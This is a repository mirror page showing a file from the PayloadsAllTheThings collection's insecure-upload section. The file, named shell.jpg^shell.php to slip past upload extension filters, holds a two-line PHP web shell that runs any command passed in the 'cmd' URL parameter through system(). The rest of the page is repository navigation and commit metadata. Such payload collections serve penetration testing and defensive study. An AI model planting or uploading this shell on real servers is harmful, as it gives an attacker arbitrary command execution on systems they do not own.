This website requires JavaScript.
Explore
Help
Sign In
ch0ic3
/
PayloadsAllTheThings
Watch
1
Star
0
Fork
0
You've already forked PayloadsAllTheThings
mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced
2024-12-18 18:36:10 +00:00
Code
Issues
Actions
Packages
Projects
Releases
Wiki
Activity
e6466b4cf9
PayloadsAllTheThings
/
Upload Insecure Files
/
Extension PHP
/
shell.jpg^shell.php
nismo-s13
410758cf80
Rename shell.jpg?shell.php to shell.jpg^shell.php
2021-11-24 17:55:52 +13:00
2 lines
44 B
PHP
Raw
Blame
History
<
?
php
echo
"
Shell
"
;
system
(
$_GET
[
'cmd'
]);
?>
Reference in New Issue
View Git Blame
Copy Permalink